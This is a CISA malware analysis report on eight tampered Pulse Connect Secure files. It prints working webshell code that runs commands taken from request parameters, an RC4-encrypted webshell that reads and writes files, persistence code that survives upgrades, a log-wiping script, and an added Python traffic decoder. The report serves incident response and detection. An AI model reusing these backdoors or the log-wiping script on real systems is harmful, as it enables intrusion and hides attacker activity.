Malware Analysis Report (AR21-202G)

MAR-10335467-1.v1: Pulse Connect Secure

Summary

Notification

This report is provided "as is" for informational purposes only. The Department of Homeland Security (DHS) does not provide any warranties of any kind regarding any information contained herein. The DHS does not endorse any commercial product or service referenced in this bulletin or otherwise.

This document is marked TLP:WHITE--Disclosure is not limited. Sources may use TLP:WHITE when information carries minimal or no foreseeable risk of misuse, in accordance with applicable rules and procedures for public release. Subject to standard copyright rules, TLP:WHITE information may be distributed without restriction. For more information on the Traffic Light Protocol (TLP), see http://www.cisa.gov/tlp.

Description

CISA received eight files for analysis. These files are Pulse Secure system applications which have been modified by a malicious cyber actor. The primary purpose of these system modifications is to provide a remote operator command and control (C2) access over a compromised device running the modified Pulse Secure software. This analysis is derived from malicious files found on Pulse Connect Secure devices.

For a downloadable copy of IOCs, see: MAR-10335467-1.v1.WHITE.stix.

Submitted Files (8)

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56 (clear_log.sh)

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9 (DSUpgrade.pm)

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767 (DSUpgrade.pm)

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf (healthcheck.cgi)

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136 (compcheckjava.cgi)

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69 (DSUpgrade.pm)

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c (meeting_testjs.cgi)

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2 (licenseserverproto.cgi)

Findings

463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9

Tags

trojan, webshell

Details
Name DSUpgrade.pm
Size 5361 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 6644c8001e89069128a6def1772ab104
SHA1 bca88545f0e413112e1463d9944a9c217e8ddf83
SHA256 463023f0969b2b52bc491d8787de876e59f0d48446f908d16d1ce763bbe05ee9
SHA512 46273c43a98e3b4a7c7d7daefdb0059b0cd72fa449c86238b80fced095236d33be8e522ccc9c32b3d1fe1855910ff1a43a2b2f583c3547a9e563380d9c47d62b
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX2SAF1D2smrsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbl:eIB1XcTfX2hgsmrs+gF3Ar8yXp6uIyUj
Entropy 5.038950
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

The file contains malicious code that was patched into the Pulse Secure application.

--Begin Legitimate Code--
sub extractPackage {
my ($path, $console, $html) = @_;
return "No content read from package file" if (-z $path);

$ENV{"DSINSTALL_PACKAGE"} = $path;

print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";
print $console "Verifying package integrity ...";

local *FH;
my $prog = "/pkg/packdecrypt";
popen(*FH, "$prog $path /tmp/new-pack.tgz");

my $buffer;
my ($rin, $rout, $rerr) = ('','', '');
vec($rin, fileno(*FH), 1) = 1;
my $ts = time;
while (1) {
    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);
    if ($nfound) {
        my $n = sysread(*FH, $buffer, 64);
        last if !$n;
        print $html $buffer;
    }
    else {
        print $html '.';
        print $console ".";
    }
}
close(*FH);
--End Legitimate Code--

--Begin Malicious Code--
my $cgi_p="/home/webserver/htdocs/dana-na/auth/compcheckjava.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
system("cp -f /tmp/installer/do-install /pkg/");
#system("cp -f /tmp/installer/VERSION /pkg/");
system("cp -f /tmp/installer/sysboot-shlib /pkg/");
system("cp -f /tmp/installer/losetup /pkg/");
print $html system("$cmd_x");
#print $html system("sed -i '/echo_console \"Saving package\"/i$cmd_x' /pkg/do-install");
system("rm -rf /tmp/installer");
my $td = time - $ts;
my $status = $? % 255;
if ($status == 0) {
   print $html " complete ($td seconds)</li>";
   print $console " complete\r\n";
}
else {
   print $html " failed</li>";
   print $console " failed\r\n";
}


return $status == 0;
}
--End Malicious Code--

The patched-in code runs the following sed command to patch a malicious webshell into the Pulse Secure system file /pkg/do-install:

--Begin Malicious SED Command--
"sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
--End Malicious SED Command--

The purpose of the webshell is to accept a parameter named "id" from an incoming web application POST request. The webshell then executes the data provided in the "id" parameter as an operating system command via the system() function.

db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c

Tags

webshell

Details
Name meeting_testjs.cgi
Size 3003 bytes
Type Perl script text executable
MD5 07eb01481c6b72800c0a0eed17a2b3bd
SHA1 9df4c1e279e9f9cdd2e5b4fe919490256cfb7adf
SHA256 db389b866913e5af287eb3288cc1f5e8a114484bb9309cc05afbea8943d0887c
SHA512 8d1763fe185d97b0a7393347cedd6a6b896cf7563e486fab318bb2a88a68e12972c54a4740983f779cad46a78b3ffd1050c1302fdbcbd38dc724be06e734d4c0
ssdeep 48:E1LYmef1MmZ1rk5s+y93VuIxsv9vheLvxkbYu6O9GnMr3mNdLAZkV3R8ewRRVfZQ:EJYb5ZBkO+ypVVxsv9vheLvxkV6O9Gnh
Entropy 5.520210
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Common Gateway Interface (CGI) application with the following malicious code patched in. The code first checks whether data was passed to the web application in a parameter named "id". If this parameter is provided, the code extracts its contents and executes them on the target system using the system() function. If no "id" parameter is passed to the application, the code simply executes the main() function of the original Pulse Secure application.

--Begin Patched In Malicious Code--
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
--End Patched In Malicious Code--

6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767

Tags

webshell

Details
Name DSUpgrade.pm
Size 9791 bytes
Type Perl5 module source, ASCII text
MD5 4d5b410e1756072a701dfd3722951907
SHA1 cc68a9c5ff57129e8b897d228e54807841f8ff67
SHA256 6959bbbe345b9699282b8a599b6a65e53731720905e2a40aaca16fa796ffe767
SHA512 965b13b1a11c2b2472de1f491bb3fde1d96288fa204428b135281ae7928a5bafea5c244fdd1f47a96242861c94a4fa8d5f6664f543dec33cfc519faca044766d
ssdeep 192:eIB1XcTfXss+nBqXb+TSWbgXCiwWjoBTWFI4MhiirXHLwQBNaBiF3Ar8yXpayUM6:eIB1X1phiJ/irZNaBiF3CjCswmPyVoM
Entropy 5.235000
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application that has been modified to add webshell script code into the content of the Pulse Secure Perl CGI script file "/root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi."

The script contains the following patched-in, commented-out code:

--Begin Patched In Commented CGI Code--
###scriptstart
#/bin/mount -o remount,rw /dev/root /
#/bin/tar -xzf $innerarchive ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -xzf $innerarchive ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#start_total/,/\#\#end_total/w 7CxA1p' outer-do-install
#/bin/sed -i '/DSINSTALL_CLEAN/r 7CxA1p' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w GqTv3w' outer-do-install
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w Vi6d8h4' outer-do-install
#/bin/sed -i '/^use DSUtilTable/r GqTv3w' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/^sub main/r Vi6d8h4' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/#//' ./root/home/perl/DSUpgrade.pm
#/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/^/#/' ./root/home/perl/DSUpgrade.pm
#/usr/bin/gzip -d $innerarchive
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi
#/bin/tar -f /tmp/inside-package.tar -u ./root/home/perl/DSUpgrade.pm
#/bin/rm -f 7CxA1p
#/bin/rm -f GqTv3w
#/bin/rm -f Vi6d8h4
#/bin/rm -fr root
#/usr/bin/gzip -c /tmp/inside-package.tar > $innerarchive
###scriptend

###cgistart1
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib";
#use lib ($ENV{'DSINSTALL'} =~ /(\S*)/)[0] . "/perl/lib/MIME/Base64";
#use Crypt::RC4;
#use MIME::Base64 ();
#
#sub parse_parameters ($) {
# my %ret;
#
# my $input = shift;
#
# foreach my $pair (split('&', $input)) {
#    my ($var, $value) = split('=', $pair, 2);
#    
#    if($var) {
#     $value =~ s/\+/ /g ;
#     $value =~ s/%(..)/pack('c',hex($1))/eg;
#
#     $ret{$var} = $value;
#    }
# }
#
# return %ret;
#}
###cgiend1

###cgistart2
#    my $enckey='1234567';
#    my $data='1234567812345678';
#        my $cipher = RC4($enckey, $data);    
#        my $encode = MIME::Base64::encode($cipher);
#    my $psalLaunch = CGI::param("serverid");
#    if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
#    {
#    my ($cmd, %FORM);
#
#    $|=1;
#
#    print "Content-Type: text/html\r\n";
#    print "\r\n";
#    %FORM = parse_parameters($ENV{'QUERY_STRING'});
#
#    if(defined $FORM{'cmd'}) {
#     $cmd = $FORM{'cmd'};
#    }
#
#print '<HTML>
#<body>
#<form action="" method="GET">
#<input type="text" name="cmd" size=45 value="' . $cmd . '">
#<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
#<input type="submit" value="Run">
#</form>
#<pre>';
#
#if(defined $FORM{'cmd'}) {
# print "Results of '$cmd' execution:\n\n";
# print "-"x80;
# print "\n";
#
# print $encode;
# system $cmd;
# print "-"x80;
# print "\n";
#}
# print "</pre>";
# exit(0);
#    }
###cgiend2

##end_total
--End Patched In Commented CGI Code--

The Pulse Secure Perl script also contains the following suspicious live (uncommented) code. This code is designed to modify several Pulse Secure system files using the sed command and to install code from an archive named new-pack.tgz that is expected to be present on the target system.

--Begin Patched In Live/Uncommented Code--
sub installPackage {
my ($clean, $console, $html) = @_;

$ENV{"DSINSTALL_CLEAN"} = $clean;

##start_total
##perlstart
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar -xzf /tmp/new-pack.tgz ./installer/outer-do-install");
my $statushh = $? % 255;
if( $statushh != 0 )
{
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -xzf /tmp/new-pack.tgz ./root/home/perl/DSUpgrade.pm");    
       system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w K872Bu' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/DSINSTALL_CLEAN/r K872Bu' ./root/home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/w Mj1Za' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/w 1uMfVB' /home/perl/DSUpgrade.pm");
       system("/bin/sed -i '/^use DSUtilTable/r Mj1Za' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/^sub main/r 1uMfVB' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart1/,/\#\#cgiend1/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/sed -i '/\#\#cgistart2/,/\#\#cgiend2/s/#//' ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/usr/bin/gzip -d /tmp/new-pack.tgz");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/webserver/htdocs/dana-na/licenseserver/licenseserverproto.cgi");
       system("/bin/tar -f /tmp/new-pack.tar -u ./root/home/perl/DSUpgrade.pm");
       system("/bin/rm -f K872Bu");
       system("/bin/rm -f Mj1Za");
       system("/bin/rm -f 1uMfVB");    
       system("/bin/rm -fr root");
       system("rm -f /tmp/new-pack.tgz");
       system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");                                        
}
else{
system("/bin/sed -i '/\#\#start_total/,/\#\#end_total/w Nc3Gy.pm' /home/perl/DSUpgrade.pm");
system("/bin/sed -i '/packdecrypt/r Nc3Gy.pm' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#perlstart/,/\#\#perlend/s/^/#/' ./installer/outer-do-install");
system("/bin/sed -i '/\#\#scriptstart/,/\#\#scriptend/s/#//' ./installer/outer-do-install");
system("/usr/bin/gzip -d /tmp/new-pack.tgz");
system("/bin/tar -f /tmp/new-pack.tar -u ./installer/outer-do-install");
system("rm -f Nc3Gy.pm");
system("rm -f /tmp/new-pack.tgz");
system("/usr/bin/gzip -c /tmp/new-pack.tar > /tmp/new-pack.tgz");
system("rm -fr installer");
}
--End Patched In Live/Uncommented Code--

Analysis indicates this live/uncommented code is designed to present a web form to a remote operator, wherein the remote operator can enter commands that will be run locally on the target system. The live/uncommented code also has the capability to modify several Pulse Secure system files utilizing the SED command.

829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf

Tags

webshell

Details
Name healthcheck.cgi
Size 9275 bytes
Type Perl script text executable
MD5 dee973c4ba232541b689b67ab41aa925
SHA1 7b0bc1c2442d672ffbd1cc0a9e67dbeae4d72f52
SHA256 829b3a9e91ed8c2a0a9d77ea9c4d8adeb0b815e03502d7b5d643400d3b0828bf
SHA512 08f5c21c303a38a671c17e6731ef45aa39f581db632d8f2c0c674fe44927d05152691ff31b38d874fffb87b5fa02e4c82efe0a962cc4fd1cb28ba61d0f648955
ssdeep 192:XzwJNuIYj7rcCOk1QrhMeWyOUV9AWojcZiOQiQsfinnoK9Cih1pa+7yiEhm:XzwJwrXWOUV9AWojoiOugQ
Entropy 5.120132
Antivirus
Symantec Hacktool.Webshell
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI script with malicious code patched into it; the modification turns the file into a webshell. The following listing includes CISA comments that describe the capabilities of this patched webshell:

--Begin Malicious Code--
if ($ENV{'REQUEST_METHOD'} eq "POST")        //CISA COMMENT: $ph variable contains RC4 crypto key
$ph="[REDACTED]";
sub r             //CISA COMMENT: Generate random block of data
{
my $n=$_[0];
my $rs;
for (my $i=0;$i<$n;$i++)
{
    my $n1=int(rand(256));
    $rs.=chr($n1);
}
return $rs;
}
sub a             //CISA COMMENT: RC4 / BASE64 encryption function
{
my $st=$_[0];
my $k=r(6);
my $en = RC4( $k.$ph, $st);
return encode_base64($k.$en);
}
sub b         //CISA COMMENT: RC4 / BASE64 decryption function
{
my $s= decode_base64($_[0]);
my $l=length($s);
my $k= substr($s,0,6);
my $en=substr($s,6,$l-6);
my $de = RC4( $k.$ph, $en );
return $de;
}
sub c                     //CISA COMMENT: Download File from target system
{
my $fi=CGI::param('img');
my $FN=b($fi);
my $fd;
print "Content-type: application/x-download\n";
open(*FILE, "<$FN" );
while(<FILE>)
{
    $fd=$fd.$_;
}
close(*FILE);
print "Content-Disposition: attachment; filename=tmp\n\n";
print a($fd);        //CISA COMMENT: RC4 ENCRYPT and BASE64 encode file before giving it to operator
}
sub d
{
print "Cache-Control: no-cache\n";
print "Content-type: text/html\n\n";
my $fi = CGI::param('cert');                    //CISA COMMENT: 'cert' contains name of the file to be written.
$fi=b($fi);
my $pa=CGI::param('md5');                 //CISA COMMENT: 'md5' contains the content to be written to file.
$pa=b($pa);
open (*outfile, ">$pa");
print outfile $fi;                                     //CISA COMMENT: The content is written to the file.
close (*outfile);
}
sub e     //CISA COMMENT: Decrypt and execute provided system command
{
print "Cache-Control: no-cache\n";
print "Content-type: image/gif\n\n";
my $na=CGI::param('name');
$na=b($na);    //CISA COMMENT: Base64 decode and RC4 decrypt incoming command
my $rt;
if (!$na or $na eq "cd")
{
    $rt="Error 404";
}
else
{
    my $ot="/tmp/1";
    system("$na >/tmp/1 2>&1");     //CISA COMMENT: Execute decrypted command
    open(*cmd_result,"<$ot");
    while(<cmd_result>)
    {
    $rt=$rt.$_;
    }
    close(*cmd_result);
    unlink $ot
}
print a($rt);
}
sub f
{
if(CGI::param('cert'))
{
    d();
}
elsif(CGI::param('img') and CGI::param('name'))
{
    c(); //CISA COMMENT: Download file from system
}
elsif(CGI::param('name') and CGI::param('img') eq "")
{
    e(); //CISA COMMENT: Decrypt and execute provided system command
}
else
{
    &main();
}
}
if ($ENV{'REQUEST_METHOD'} eq "POST")
{
f();
}
else
{
&main();
}
--End Malicious Code--

The webshell allows a remote operator to read and write files on the target system and to pass system commands that are executed locally. The data passed to and from this webshell is RC4 encrypted with a hard-coded RC4 key.
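The transport format used by subs a and b above (6 random key-prefix bytes, RC4 keyed with prefix.$ph, then base64) is what an incident responder has to undo to read captured requests and responses to this webshell. The following decoder is an added example, not CISA's or the malware's code; the $ph value is redacted in the report, so PH below is a placeholder, and the sample POST bodies are constructed here only to exercise the decoder.

```python
import base64
import os
from urllib.parse import parse_qs, urlencode

# Placeholder: the real $ph key is redacted in the report. Replace it with the
# value recovered from the compromised healthcheck.cgi before decoding captures.
PH = b"REDACTED-PLACEHOLDER-KEY"

# Fields the webshell passes through sub b before use (see subs c, d and e).
ENCRYPTED_FIELDS = ("name", "img", "cert", "md5")


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (KSA + PRGA), equivalent to Crypt::RC4's RC4($key, $data)."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def unwrap(blob: str, ph: bytes = PH) -> bytes:
    """sub b: base64-decode, split off the 6-byte prefix k, RC4 with k.$ph.
    b64decode discards the line breaks Perl's encode_base64 inserts."""
    raw = base64.b64decode(blob)
    if len(raw) < 6:
        raise ValueError("blob shorter than the 6-byte key prefix")
    k, en = raw[:6], raw[6:]
    return rc4(k + ph, en)


def wrap(data: bytes, ph: bytes = PH, k=None) -> str:
    """sub a: random 6-byte k, RC4 with k.$ph, base64 of k + ciphertext.
    Used here only to build constructed sample traffic for the decoder."""
    if k is None:
        k = os.urandom(6)
    return base64.b64encode(k + rc4(k + ph, data)).decode()


def classify(body: str) -> str:
    """Mirror sub f's dispatch on the raw (still encrypted) POST fields."""
    fields = parse_qs(body, keep_blank_values=True)

    def present(p):
        return bool(fields.get(p, [""])[0])

    if present("cert"):
        return "write-file"        # sub d: 'md5' is the path, 'cert' the content
    if present("img") and present("name"):
        return "read-file"         # sub c: 'img' names the file to read back
    if present("name"):            # 'img' absent or empty
        return "exec"              # sub e: 'name' is the command
    return "legitimate-main"       # falls through to the original &main()


def decode_request(body: str, ph: bytes = PH) -> dict:
    """Decrypt every encrypted field of a captured POST body."""
    fields = parse_qs(body, keep_blank_values=True)
    decoded = {}
    for name in ENCRYPTED_FIELDS:
        values = fields.get(name)
        if values and values[0]:
            decoded[name] = unwrap(values[0], ph)
    return decoded


def sample_exec_body() -> str:
    """Constructed sample: a command request as the operator's client sends it."""
    return urlencode({"name": wrap(b"id", k=b"ABCDEF")})


def sample_write_body() -> str:
    """Constructed sample: a file-write request (path in 'md5', content in 'cert')."""
    return urlencode({"md5": wrap(b"/tmp/x", k=b"123456"),
                      "cert": wrap(b"hello", k=b"654321")})


if __name__ == "__main__":
    for body in (sample_exec_body(), sample_write_body()):
        print(classify(body), decode_request(body))
```

Responses from sub e and sub c are wrapped with the same sub a, so unwrap() applied to a captured response body yields the command output or file content the operator received.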

1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56

Tags

webshell

Details
Name clear_log.sh
Size 713 bytes
Type Bourne-Again shell script, ASCII text executable
MD5 00f8c2497fadd2979c08487181cfc4fd
SHA1 0577f0c4d5c40641448961a7ccf348bcfceec4a5
SHA256 1e862c3be851c984843f8b36e14decc1b25aed75e1bee4fd184ca70c4aaa7d56
SHA512 50733b16b5d9451ea2f48d2f696c3eedf39a465535904c8db34d471f387292a13723164cf22c00e1801e1a387033691d10ca629020cb4bcf88b943a8713b1ac4
ssdeep 12:4+/jndfJGpOL9H6niyG9H6wEDs+/xI8lTDAGs+0zI8lKeZEDS/w4Qcvc:lfE80nic1f/xI8lXAGf0zI8lKeqS/fvc
Entropy 4.934267
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This malicious file contains the script illustrated below:

—Begin Script—
#!/bin/bash

declare -A dic
dic=(
[events]=log.events.vc0
[user_access]=log.access.vc0
[admin_access]=log.admin.vc0
)

if [ $# = 2 ]; then
for log in ${!dic[@]};
do
   if [ $1 = ${log} ]; then
    for I in "8" "9" "a" "b" "c" "d" "e" "f";do
       for J in "0" "1" "2" "3" "4" "5" "6" "7" "8" "9" "a" "b" "c" "d" "e" "f";do
        sed -i "s/.\x00[^\x00]*$2[^\x00]*\x09.\x00//g" /data/runtime/logs/${dic[${log}]}
        sed -i "s/\x$I$J\x00[^\x00]*$2[^\x00]*\x09\x$I$J\x00//g" /data/runtime/logs/${dic[${log}]}
       done
    done
   fi
done
# sed -i "s/.\x00[^\x00]*$1[^\x00]*\x09.\x00//g" log.events.vc0
else
   echo "usage: /home/bin/bash clear_log.sh [logfile] [keyword(regex)]"
fi
—End Script—

This script is designed to allow a malicious operator to modify the following log files on a Pulse Secure system:

—Begin Log Files—
log.events.vc0
log.access.vc0
log.admin.vc0
—End Log Files—

It is presumed the operator will leverage this utility to hide malicious cyber actor activity carried out on target Pulse Secure devices.

859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136

Tags

webshell

Details
Name compcheckjava.cgi
Size 1815 bytes
Type Perl script text executable
MD5 5903d2d544533cd43e82527faac6567a
SHA1 13b53fd7fad41cf727764a0c23a031831c5147ea
SHA256 859bfee6ebbc8823e998fe7140303292c2925f57a11368d1be5b393b1015f136
SHA512 480d1f34c1e8d195e0bd3c4c41bf50cd94e87d968c7a2448ccf790750f5dc4a7e88d6799a5812bc418f79fc92ecedd0efb3844a86ca1ab060251cbf69d6e84dd
ssdeep 48:ErLYUsef1MmZ1rkp6u13CDIqc7b6wn1GE+MI0R8eu/nf3we:EfY05ZBkpzhCDdyGXMj4nx
Entropy 5.541530
Antivirus
Symantec Hacktool.Atrium
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious code patched in:

--Begin Malicious Code--
if(CGI::param("id")){print "Cache-Control: no-cache\n";print "Content-type: text/html\n\n";my $na=CGI::param("id");system("$na");}else{&main();}
--End Malicious Code--

This patched-in code first checks whether data was passed to the web application in a parameter named "id". If this parameter is provided, the code extracts its contents and executes them on the target system using the system() function. If no "id" parameter is passed to the application, the code simply executes the main() function of the original Pulse Secure application.

e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2

Tags

webshell

Details
Name licenseserverproto.cgi
Size 3517 bytes
Type Perl script text executable
MD5 51751d9ed17047f8dd579e3b8a9e82be
SHA1 df50d0035a86b68d6c382c3364d7e1046fddb8a6
SHA256 e1efbc8b6ed320bc5762ebd6d59b8ba4c5792c4a6e7f3a605c8c7cb61fadd9a2
SHA512 930b581705e4eeef5e812ac1cd48eda90b31761ef5e035539c01e3b178215b5f3fa855f0a0cdaa725d029879f764e410b2b90090a603516e6d8ced217c03fa21
ssdeep 48:ElLYmeAJAZoZpBHMeQT808inRbxUQjQk0BeWo7BuswT4o7oo7vpBBBQWBZ7zSH74:EZYkJAZOpBqpxUxHo0v/wO27YJ
Entropy 5.319437
Antivirus

No matches found.

YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure CGI application with the following malicious webshell code patched in:

—Begin Patched Main Function—
##cgiend1
sub main {
##cgistart2
   my $enckey='1234567';
   my $data='1234567812345678';
       my $cipher = RC4($enckey, $data);    
       my $encode = MIME::Base64::encode($cipher);
   my $psalLaunch = CGI::param("serverid");
   if ($psalLaunch =~ /csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa/)
   {
   my ($cmd, %FORM);

   $|=1;

   print "Content-Type: text/html\r\n";
   print "\r\n";
   %FORM = parse_parameters($ENV{'QUERY_STRING'});

   if(defined $FORM{'cmd'}) {
    $cmd = $FORM{'cmd'};
   }

print '<HTML>
<body>
<form action="" method="GET">
<input type="text" name="cmd" size=45 value="' . $cmd . '">
<input type="text" name="serverid" size=45 value="csJ1TA45JzB0WJrjA5X8dpVbXcrDMVfa">
<input type="submit" value="Run">
</form>
<pre>';

if(defined $FORM{'cmd'}) {
print "Results of '$cmd' execution:\n\n";
print "-"x80;
print "\n";

print $encode;
system $cmd;
print "-"x80;
print "\n";
}
print "</pre>";
exit(0);
   }
—End Patched Main Function—

This malicious code replaces the legitimate main function. The modified main function checks whether a parameter named "serverid" carrying the expected value is provided to the web application. If it is, it parses the "cmd" parameter out of the query string and executes it on the target system using the system() function. This modification effectively turns the legitimate Pulse Secure web application into a webshell that allows a remote operator to execute system commands on a compromised system.

c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69

Tags

trojan, webshell

Details
Name DSUpgrade.pm
Size 5260 bytes
Type Perl5 module source, ASCII text, with very long lines
MD5 8b89bd0395c3db9a85b340e5bd8775fc
SHA1 2c8843427ee85b2212ce7ee1c9d3a5e254154aca
SHA256 c366c9d41c2bff9fce8a74e2a323f2e104149cf993413dddd8514bb69b054d69
SHA512 a17675d93c894961cc18b1f01a4ce526936fd246fed5150f425759e4889a4150c23a13468deeb95440f9d846998f9adfba553c4112d6fb8057b773e57e1893be
ssdeep 96:FYIFAu1JZtGm4OcAHgDfX2HAF1K2dsvWlgzP5Ft8gb16rJ2yXp6uIvWZlGMQbvek:eIB1XcTfX2QDds+gF3Ar8yXp6uIyUMQB
Entropy 5.033089
Antivirus
ClamAV Unix.Trojan.ATRIUM-9855919-0
YARA Rules

No matches found.

ssdeep Matches

No matches found.

Description

This file is a Pulse Secure Perl application with the following malicious code patched in:

—Begin Malicious Patched In Code—
sub extractPackage {
my ($path, $console, $html) = @_;
return "No content read from package file" if (-z $path);

$ENV{"DSINSTALL_PACKAGE"} = $path;

print $html "<li style=\"margin:6px;\">Step 1: Verifying package integrity ...";
print $console "Verifying package integrity ...";

local *FH;
my $prog = "/pkg/packdecrypt";
popen(*FH, "$prog $path /tmp/new-pack.tgz");

my $buffer;
my ($rin, $rout, $rerr) = ('','', '');
vec($rin, fileno(*FH), 1) = 1;
my $ts = time;
while (1) {
    my ($nfound, $timeleft) = select($rout=$rin, undef, undef, 1);
    if ($nfound) {
        my $n = sysread(*FH, $buffer, 64);
        last if !$n;
        print $html $buffer;
    }
    else {
        print $html '.';
        print $console ".";
    }
}
close(*FH);
my $cgi_p="/home/webserver/htdocs/dana-na/meeting/meeting_testjs.cgi";
my $cmd_x="sed -i '/echo_console \"Saving package\"/i(sed -i \\\'/main();\\\$/cif(CGI::param(\\\\\"id\\\\\")){print \\\\\"Cache-Control: no-cache\\\\\\\\n\\\\\";print \\\\\"Content-type: text/html\\\\\\\\n\\\\\\\\n\\\\\";my \\\\\$na=CGI::param(\\\\\"id\\\\\");system(\\\\\"\\\\\$na\\\");}else{&main();}\\\' /tmp/data/root$cgi_p;cp -f /home/perl/DSUpgrade.pm /tmp/data/root/home/perl;cp -f /pkg/dspkginstall /tmp/data/root/pkg/;)' /pkg/do-install";
system("/bin/mount -o remount,rw /dev/root /");
system("/bin/tar", "-xzf", "/tmp/new-pack.tgz", "-C", "/tmp","./installer");
